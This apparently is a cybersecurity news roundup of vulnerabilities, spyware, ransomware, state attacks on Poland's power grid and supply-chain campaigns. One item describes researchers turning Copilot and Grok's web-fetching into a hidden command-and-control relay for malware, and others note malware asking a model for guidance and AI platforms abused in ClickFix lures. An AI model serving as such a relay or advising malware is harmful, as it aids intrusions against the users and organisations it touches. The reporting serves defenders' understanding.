A critical vulnerability (CVE-2026-1670) in multiple Honeywell CCTV products allows unauthenticated attackers to change recovery email addresses, enabling account takeover and unauthorized access to camera feeds. The flaw, rated 9.8 in severity, affects mid-level surveillance products used in commercial, industrial, and critical infrastructure settings. As of February 17, 2026, no public exploitation has been reported, but CISA advises mitigations to reduce risk.

Researchers have demonstrated that AI assistants like Microsoft Copilot and xAI Grok can be exploited as command-and-control (C2) proxies. This technique leverages the AI's web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed AI as a C2 proxy, allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion. The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. This approach bypasses traditional defenses like API key revocation or account suspension. According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return responses. The AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account. The method relies on AI assistants that support URL fetching and content summarization, allowing attackers to tunnel encoded data through query parameters and receive embedded commands in the AI's reply. Malware can interact with the AI interface invisibly using a WebView2 browser component inside a C++ program. The research also outlined a broader trend: malware that integrates AI into its runtime decision-making, sending host information to a model and receiving guidance on actions to prioritize.

Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information. New research has confirmed that Predator spyware was used to target an Angolan journalist, Teixeira Cândido, in May 2024 via a WhatsApp link. The infection lasted less than one day and was removed when the device was restarted. Attackers made 11 additional attempts to re-infect the device, all of which failed. Predator spyware incorporates advanced anti-analysis mechanisms and has explicit checks to avoid running in U.S. and Israeli locales.

A critical vulnerability (CVE-2026-2329) in Grandstream GXP1600 series VoIP phones allows unauthenticated remote code execution (RCE) with root privileges. The flaw, a stack-based buffer overflow, stems from the device's web-based API service. The vulnerability affects multiple GXP1600 models and has been addressed in firmware version 1.0.7.81. Exploiting this flaw could enable attackers to extract stored credentials, intercept phone calls, and eavesdrop on VoIP conversations. The issue was discovered by Rapid7 researcher Stephen Fewer and demonstrated via a Metasploit exploit module.

A critical authentication bypass vulnerability in SmarterMail email software (WT-2026-0001, CVE-2026-23760) has been actively exploited in the wild just two days after a patch was released. The flaw allows attackers to reset the system administrator password via a crafted HTTP request, leading to remote code execution (RCE) on the underlying operating system. The vulnerability was patched on January 15, 2026, but attackers reverse-engineered the patch to exploit it. Over 6,000 SmarterMail servers were found exposed online and likely vulnerable to attacks exploiting the flaw. Shadowserver is tracking these servers, with more than 4,200 in North America and nearly 1,000 in Asia. Macnica threat researcher Yutaka Sejiyama found over 8,550 SmarterMail instances still vulnerable. CISA added the vulnerability to its list of actively exploited vulnerabilities, ordering U.S. government agencies to secure their servers by February 16. Threat actors rapidly shared proof-of-concept exploits, offensive tools, and stolen administrator credentials related to SmarterMail vulnerabilities on underground Telegram channels and cybercrime forums. SmarterTools was breached in January 2026 after attackers exploited an unpatched SmarterMail server running on an internal VM. Ransomware operators gained initial access through SmarterMail vulnerabilities and waited before triggering encryption payloads. Over 34,000 servers were found on Shodan with indications of running SmarterMail, with 1,185 vulnerable to authentication bypass or RCE flaws. CISA added CVE-2026-24423 to the Known Exploited Vulnerabilities catalog in February 2026, confirming active ransomware exploitation.

Microsoft is addressing a bug in its anti-spam service that incorrectly blocks URLs in Exchange Online and Microsoft Teams, causing some emails to be quarantined. The issue began on September 5, 2025, affecting users who received false alerts about malicious URLs. Over 6,000 URLs have been identified as affected, and Microsoft is working to unblock them and recover any incorrectly flagged messages. The bug is due to the anti-spam engine mistakenly tagging URLs within other URLs as potentially malicious. Microsoft has deployed a partial fix and is continuing to address the impact. The incident has been classified as an event with noticeable user impact, although the exact number of affected customers and regions remains undisclosed. In a new development, on February 5, 2026, another incident began where Exchange Online mistakenly flags legitimate emails as phishing and quarantines them. This issue is caused by a new URL rule that incorrectly flags some URLs as malicious. Microsoft is working to release quarantined emails and confirm that legitimate URLs are unblocked. The incident, tracked by Microsoft under EX1227432, was not fully resolved until February 12. The root cause was a logic error in a detection system designed to identify new credential phishing attacks, which also led to false positive alerts. Other security tools within Microsoft's detection infrastructure amplified the incident's impact, and a separate bug in the company's security signature systems further delayed efforts to roll back the flawed detection rules. Microsoft will issue a final report within five business days of full resolution. Similar issues have occurred throughout the year, including a May 2025 incident where a machine learning model incorrectly flagged Gmail emails as spam in Exchange Online.

The threat actor Silver Fox has been exploiting a previously unknown vulnerable driver associated with WatchDog Anti-malware to deploy ValleyRAT malware. The driver, 'amsdk.sys' (version 1.0.600), is a validly signed Windows kernel device driver built on the Zemana Anti-Malware SDK. This driver allows arbitrary process termination and local privilege escalation, enabling the attackers to neutralize endpoint protection products and deploy the ValleyRAT remote access trojan. The campaign, first observed in late May 2025, targets Chinese-speaking victims using various social engineering techniques and trojanized software. The WatchDog driver has been patched, but attackers have adapted by modifying the driver to bypass hash-based blocklists. Silver Fox, also known as SwimSnake and UTG-Q-1000, is highly active and organized, targeting domestic users and companies to steal secrets and defraud victims. Recently, a newly identified cryptojacking campaign has been uncovered, spreading through pirated software installers. This campaign deploys system-level malware using a customised XMRig miner and a controller component for persistence. The controller, named Explorer.exe, functions as a state-driven orchestrator. The malware includes a hardcoded expiration date of December 23, 2025, for self-removal. The campaign uses a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access and modifies CPU registers to disable hardware prefetchers, boosting mining performance. The campaign connects to the Kryptex mining pool at xmr-sg.kryptex.network:8029.

Cogent Security has raised $42 million in Series A funding to develop autonomous AI agents for vulnerability remediation. The funding will accelerate product development for their agentic AI platform, which automates investigation, prioritization, and remediation tasks in vulnerability management. The platform integrates vulnerability data across environments, reduces scanner noise, and incorporates business context to prioritize risks beyond standard severity scores. The company aims to streamline security operations by automating coordination tasks, allowing security teams to focus on critical threats.

Figure Technology Solutions, a blockchain-based fintech firm, suffered a data breach affecting nearly 1 million accounts. Hackers stole personal and contact information through a social engineering attack. The breach was attributed to the ShinyHunters extortion group, which leaked 2.5GB of data from loan applicants. The attackers impersonated IT support to trick employees into providing access to SSO accounts, gaining entry to various enterprise applications.

Multiple high-to-critical severity vulnerabilities in popular VSCode extensions, collectively downloaded over 125 million times, expose developers to remote code execution (RCE) and file theft. The affected extensions include Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview. Researchers at Ox Security discovered these flaws in June 2025 but received no response from maintainers. Exploitation could lead to lateral movement, data exfiltration, and system takeover in corporate environments. Microsoft silently fixed the Live Preview vulnerability in version 0.4.16 released in September 2025.

A bug in Microsoft 365 Copilot has been causing the AI assistant to summarize confidential emails since late January, bypassing data loss prevention (DLP) policies. The issue affects the Copilot 'work tab' chat feature, which incorrectly reads and summarizes emails stored in users' Sent Items and Drafts folders, including messages with confidentiality labels. Microsoft confirmed the bug and began rolling out a fix in early February, but the full remediation timeline and scope of impact remain undisclosed.

In 2026, cybersecurity is characterized by continuous instability driven by AI threats, regulatory pressures, and geopolitical tensions. Organizations are shifting from reactive security measures to structural reinforcements that ensure operational continuity. Key trends include integrating regulatory and geopolitical considerations into cybersecurity architecture, making attack surfaces unreliable through dynamic defenses, and leveraging AI to accelerate security operations. Security is becoming a lifecycle discipline across digital ecosystems, with Zero Trust evolving into continuous decision-making and adaptive control. Data security and privacy engineering are essential for scalable AI, and post-quantum risk is making crypto agility a design requirement.

In 2025, ransomware victims listed on extortion sites surged by 30% annually, reaching 7458. The number of active ransomware groups also hit a new high of 124, with 73 new groups identified. AI is lowering the barrier to entry for new threat groups, aiding in social engineering, data analysis, and ransomware negotiations. Despite the increase in victims, ransom payments fell by 35% in 2024, and this trend is likely to have continued in 2025. The ransomware ecosystem remains professionalized and effective, with large syndicates fracturing into smaller, agile cells, making the threat landscape more complex.

A Glendale man, Davit Avalyan, was sentenced to 57 months in federal prison for his role in a darknet drug trafficking operation that distributed cocaine, methamphetamine, MDMA, and ketamine across the United States. The operation, which ran from 2018 to 2025, involved multiple darknet vendor accounts and was dismantled by the FBI's JCODE task force. Avalyan is the last of four defendants to be sentenced in this case, with his accomplices receiving sentences ranging from 24 to 120 months. The group used various darknet marketplaces to sell drugs and shipped them via the U.S. Postal Service.

Security and IT teams are leveraging intelligent workflows to automate phishing response, IT service requests, and vulnerability management. These workflows integrate automation, AI-driven decisioning, and human oversight to streamline operations and reduce manual workloads. The workflows use existing tools like VirusTotal, URLScan.io, Sublime Security, Slack, and Tenable to automate tasks such as phishing email analysis, IT service request processing, and vulnerability monitoring. These solutions aim to free up teams to focus on higher-value work while ensuring governance and scalability.

A Chinese APT group, identified as UNC6201, has been exploiting a critical zero-day vulnerability (CVE-2026-22769) in Dell's RecoverPoint for Virtual Machines since mid-2024. The flaw, a hardcoded credential bug with a CVSS score of 10.0, allows unauthenticated attackers to gain root-level access and maintain persistence. The group has used this vulnerability to deploy malware, including Slaystyle, Brickstorm, and a new backdoor called Grimbolt. Mandiant has also observed novel tactics such as creating ghost NICs and using iptables for single packet authorization (SPA).

Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider level, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected. Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain. Notepad++ version 8.9.2 also addresses a high-severity vulnerability (CVE-2026-25926, CVSS score: 7.3) that could result in arbitrary code execution in the context of the running application. An Unsafe Search Path vulnerability (CWE-426) exists when launching Windows Explorer without an absolute executable path, which may allow execution of a malicious explorer.exe if an attacker can control the process working directory.

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. CISA has added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog and ordered U.S. government agencies to secure their systems against the flaw by February 16, 2026. CISA also added four other vulnerabilities to its KEV catalog, including CVE-2026-2441, CVE-2024-7694, CVE-2020-7796, and CVE-2008-0015. CVE-2026-2441 is a use-after-free vulnerability in Google Chrome with a CVSS score of 8.8. CVE-2024-7694 is an arbitrary file upload vulnerability in TeamT5 ThreatSonar Anti-Ransomware versions 3.4.5 and earlier with a CVSS score of 7.2. CVE-2020-7796 is a server-side request forgery (SSRF) vulnerability in Synacor Zimbra Collaboration Suite (ZCS) with a CVSS score of 9.8. CVE-2008-0015 is a stack-based buffer overflow vulnerability in Microsoft Windows Video ActiveX Control with a CVSS score of 8.8. Google acknowledged that an exploit for CVE-2026-2441 exists in the wild. A report published by threat intelligence firm GreyNoise in March 2025 revealed that a cluster of about 400 IP addresses was actively exploiting multiple SSRF vulnerabilities, including CVE-2020-7796, to target susceptible instances in the U.S., Germany, Singapore, India, Lithuania, and Japan. The exploit for CVE-2008-0015 may connect to a remote server and download other malware, including the Dogkild worm. Federal Civilian Executive Branch (FCEB) agencies are recommended to apply the necessary fixes by March 10, 2026, for optimal protection.

A Spanish court has ordered NordVPN and ProtonVPN to block 16 websites facilitating piracy of LaLiga football matches. The order applies to a dynamic list of IP addresses in Spain and was issued without a hearing. LaLiga and Telefónica must preserve digital evidence of unlawful transmissions. The ruling aligns with similar decisions in France and recognizes VPN providers' liability for piracy. Both VPN providers have questioned the decision's validity and process. LaLiga has previously targeted Cloudflare for facilitating illegal sports streaming and demonstrated that VPN providers fall under the EU Digital Services Regulation. NordVPN criticized the blocking approach, suggesting that hosting providers should be targeted instead, and noted that free VPN services remain a loophole for piracy.

Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations and Poland's power sector using living-off-the-land (LotL) tactics and deploying data-wiping malware. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. In December 2025, Sandworm targeted Poland's power sector with a new wiper malware called DynoWiper, aiming to disrupt the energy infrastructure. The attack, which occurred on December 29 and 30, 2025, targeted two combined heat and power (CHP) plants and a system managing renewable energy sources. The attack was unsuccessful in causing disruption, and Polish authorities attributed it to Russian services. The attack coincided with the tenth anniversary of Sandworm's 2015 attack on Ukraine's power grid. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services. The cyber attack on the Polish power grid in December 2025 was attributed with medium confidence to a Russian state-sponsored hacking group known as ELECTRUM. The attack targeted distributed energy resources (DERs) and affected communication and control systems at combined heat and power (CHP) facilities and systems managing renewable energy systems. ELECTRUM and KAMACITE share overlaps with the Sandworm cluster, with KAMACITE focusing on initial access and ELECTRUM conducting operations that bridge IT and OT environments. The attackers gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site. The attack was opportunistic and rushed, with the hackers attempting to inflict as much damage as possible by wiping Windows-based devices and resetting configurations. The majority of the equipment targeted was related to grid safety and stability monitoring. The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems damaging "key equipment beyond repair," they failed to disrupt power, totaling 1.2 GW or 5% of Poland’s energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, a critical industrial infrastructure (OT) and control systems (ICS) security company say that the number is approximately 30. Dragos attributes the attack with moderate confidence to a Russian threat actor it tracks as Electrum, which, although it overlaps with Sandworm (APT44), the researchers underline that it is a distinct activity cluster. Electrum targeted exposed and vulnerable systems involved in dispatch and grid-facing communication, remote terminal units (RTUs), network edge devices, monitoring and control systems, and Windows-based machines at DER sites. Electrum successfully disabled communications equipment at multiple sites, resulting in a loss of remote monitoring and control, but power generation on the units continued without interruption. Certain OT/ICS devices were disabled, and their configurations were corrupted beyond recovery, while Windows systems at the sites were wiped. Even if the attacks had been successful in cutting the power, the relatively narrow targeting scope wouldn’t have been enough to cause a nationwide blackout in Poland. However, they could have caused significant destabilization of the system frequency. "Such frequency deviations have caused cascading failures in other electrical systems, including the 2025 Iberian grid collapse," the researchers say. CERT Polska revealed that coordinated cyber attacks targeted more than 30 wind and photovoltaic farms, a private company from the manufacturing sector, and a large combined heat and power plant (CHP) in Poland on December 29, 2025. The attacks were attributed to a threat cluster dubbed Static Tundra, which is linked to Russia's Federal Security Service's (FSB) Center 16 unit. The attacks had a purely destructive objective but did not affect the ongoing production of electricity or the heat supply to end users. The attackers gained access to the internal network of power substations associated with a renewable energy facility to carry out reconnaissance and disruptive activities, including damaging the firmware of controllers, deleting system files, or launching custom-built wiper malware codenamed DynoWiper. In the intrusion aimed at the CHP, the adversary engaged in long-term data theft dating back to March 2025, enabling them to escalate privileges and move laterally across the network. The attackers' attempts to detonate the wiper malware were unsuccessful. The targeting of the manufacturing sector company is believed to be opportunistic, with the threat actor gaining initial access via a vulnerable Fortinet perimeter device. At least four different versions of DynoWiper have been discovered to date. The wiper's functionality involves initializing a pseudorandom number generator (PRNG) called Mersenne Twister, enumerating files and corrupting them using the PRNG, and deleting files. The malware does not have a persistence mechanism, a way to communicate with a command-and-control (C2) server, or execute shell commands, and it does not attempt to hide the activity from security programs. The attack targeting the manufacturing sector company involved the use of a PowerShell-based wiper dubbed LazyWiper that scripts overwrites files on the system with pseudorandom 32-byte sequences to render them unrecoverable. The malware used in the incident involving renewable energy farms was executed directly on the HMI machine. In the CHP plant and the manufacturing sector company, the malware was distributed within the Active Directory domain via a PowerShell script executed on a domain controller. The attacker used credentials obtained from the on-premises environment in attempts to gain access to cloud services, downloading selected data from services such as Exchange, Teams, and SharePoint. The attacker was particularly interested in files and email messages related to OT network modernization, SCADA systems, and technical work carried out within the organizations. The attack on Poland's energy sector in December 2025 was the first large-scale attack against decentralized energy resources (DERs) like wind turbines and solar farms. The attack occurred during a period when Poland was struggling with low temperatures and snowstorms just before the New Year. Dragos assessed with moderate confidence that the activity reflects tradecraft and objectives in line with the Electrum threat group, which overlaps with Sandworm. Electrum has worked alongside another threat actor, tracked as Kamicite, to conduct destructive attacks against Ukrainian ISPs and persistent scanning of industrial devices in the US. Kamicite gained initial access and persistence against organizations, and Electrum executed follow-on activity. Dragos has tracked Kamicite activities against the European ICS/OT supply chain since late 2024. The attack on Poland's energy sector was significant because it was the first major attack against decentralized energy resources (DERs). There was no evidence that the adversary had full control of the DERs, and there was no attempt to mis-operate these resources. Poland was fortunate because DERs make up a smaller portion of its energy portfolio than some other countries. If this same style of attack happened in the US, Australia, or certain parts of Europe where DERs are more prevalent, it could have been potentially catastrophic for the system. The attack highlighted the ongoing threat faced by the energy sector, with threat actors gaining initial access through vulnerable Internet-facing edge devices before deploying wipers that damaged remote terminal units (RTUs). CISA advised OT operators to prioritize updates that allow firmware verification and to immediately change default passwords on things like edge devices. Dragos recommended that organizations ensure architecture is defensible through methods like strict authorization practices, OT/IT segmentation, strict vendor access governance, secure remote access, and ICS network visibility and monitoring.

Microsoft and Malwarebytes have disclosed a **DNS-based ClickFix variant** that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (**84[.]21.189[.]20**), which then deploys **ModeloRAT** via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including **ConsentFix** (Azure CLI OAuth abuse), **CrashFix** (malicious Chrome extensions triggering browser crashes), and **SyncAppvPublishingServer.vbs** (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign’s adaptability, leveraging **trusted native tools** (`nslookup`), **DNS as a C2 channel**, and **psychological manipulation** (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with **cross-platform targeting** (Windows/Linux/macOS), **AI platform abuse** (ChatGPT, Grok, Claude), and **weaponized SaaS infrastructure** (Google Groups, Pastebin) to distribute payloads like **Lumma Stealer** and **Odyssey Stealer**. The integration of **DNS staging**, **browser-native execution**, and **multi-stage loaders** underscores the campaign’s resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via **social engineering**, **steganography**, and **legitimate service abuse**.

A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various vectors, including Google Play apps. The malware provides attackers with unrestricted control over infected devices, enabling broad-range data theft and other malicious activities. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. The malware's capabilities include compromising all installed applications, installing any apps from APK files, and monitoring user activities, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices last year. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware with valid digital signatures. The malware has also been found in smart home camera apps on Google Play with 300,000 downloads, which are no longer available.

Android 17 Beta introduces a secure-by-default architecture with major security updates, including the deprecation of the android:usesCleartextTraffic attribute and the addition of HPKE hybrid cryptography support. The update also brings performance improvements and changes for large-screen devices, marking a shift towards tighter default security settings and a new continuous Canary channel for developers. The beta version aims to strengthen app protections and improve developer workflows, with platform stability targeted for March. Developers are urged to migrate to network security configuration files for more granular control over app security.

Microsoft Teams is experiencing a widespread outage causing message delays and service disruptions across all regions, including the United States and Europe. The issue began at 14:30PM ET, and Microsoft has confirmed it is investigating the problem. Recovery is observed in telemetry, but the root cause remains under investigation. Users are experiencing problems joining meetings with the Teams desktop client, accessing the Teams app, and signing in. The outage is causing delays and failures when sending and receiving chat messages that include inline media (images, code snippets, videos). Microsoft is also working to resolve additional incidents affecting Teams meetings and Copilot Studio agents.

Apple has introduced end-to-end encryption (E2EE) for Rich Communications Services (RCS) messaging in the iOS and iPadOS 26.4 Developer Beta. This feature is currently in beta and limited to Apple devices, with full rollout expected in future updates for iOS, iPadOS, macOS, and watchOS. The encryption is based on the RCS Universal Profile 3.0, which uses the Messaging Layer Security (MLS) protocol. Additionally, the beta includes enhanced memory safety protection with Memory Integrity Enforcement (MIE) and the default activation of Stolen Device Protection for all iPhone users. Applications can now opt in to the full protections of MIE, moving beyond the previously available Soft Mode. Stolen Device Protection introduces a one hour delay before allowing Apple Account password changes and requires biometric authentication for key security actions.

A study by Intruder's research team revealed that over 42,000 exposed tokens across 334 secret types were found in 5 million scanned applications. These tokens, often missed by traditional vulnerability scanners, pose significant security risks, including unauthorized access to code repositories, project management tools, and other sensitive services. The research highlights the limitations of existing secrets detection methods and underscores the need for more comprehensive scanning techniques. The exposed tokens included 688 GitHub and GitLab personal access tokens, many of which were still active and gave full access to repositories. An API key for Linear, a project management application, was also found embedded directly in front-end code, exposing the organization’s entire Linear instance. Additionally, exposed secrets were found across a wide range of other services, including CAD software APIs, email platforms, webhooks for chat and automation platforms, PDF converters, sales intelligence and analytics platforms, and link shorteners. The findings underscore the need for more comprehensive scanning techniques to prevent such exposures.

Low-skilled cybercriminals are leveraging AI to enhance their extortion campaigns, a technique dubbed 'vibe extortion' by researchers. This involves using large language models (LLMs) to script professional extortion strategies, including deadlines and pressure tactics. While the attackers themselves lack technical depth, AI provides coherence and professionalism to their threats. The use of AI in cybercrime has evolved beyond simple grammar improvements to include rapid vulnerability scanning, parallelized targeting, and automated ransomware tasks. Unit 42 researchers highlight that AI acts as a 'force multiplier' for attackers, significantly reducing operational friction and lowering the barrier to entry for cybercriminals.

A new report from Teleport reveals that AI systems with excessive access rights experience significantly higher incident rates. Over 69% of security leaders believe identity management must evolve to mitigate risks in AI infrastructure. Organizations with over-privileged AI systems report a 76% incident rate, compared to 17% for those with least-privilege controls, indicating a 4.5 times higher risk. The report highlights that static credentials and complex IT infrastructures contribute to these security issues.

A significant increase in ransomware attacks targeting industrial organizations has been observed, with 119 groups identified in 2025, a 49% rise from 2024. These attacks exploited vulnerabilities in operational technology (OT) and industrial control systems (ICS), affecting 3300 industrial organizations globally. The manufacturing sector was the most targeted, followed by transportation, oil and gas, electricity, and communications. Attackers commonly abused legitimate login credentials obtained through phishing, infostealer malware, or dark web purchases to compromise networks and deploy ransomware. The average dwell time for ransomware in OT environments was 42 days, causing operational disruptions and multi-day outages. Three new threat groups—Sylvanite, Azurite, and Pyroxene—were identified, each with distinct tactics targeting industrial systems.

A new SmartLoader campaign involves distributing a trojanized version of the Oura Model Context Protocol (MCP) server to deliver the StealC infostealer. The attackers cloned the legitimate Oura MCP Server, created fake GitHub repositories and contributors to build credibility, and submitted the trojanized server to MCP registries. The campaign targets developers, stealing credentials, browser passwords, and cryptocurrency wallet data. The attack unfolded over four stages, involving the creation of fake GitHub accounts, repositories, and contributors, followed by submission to MCP Market. The trojanized server executes an obfuscated Lua script that drops SmartLoader, which then deploys StealC. The evolution of SmartLoader indicates a shift towards targeting developers, whose systems contain sensitive data like API keys and cloud credentials.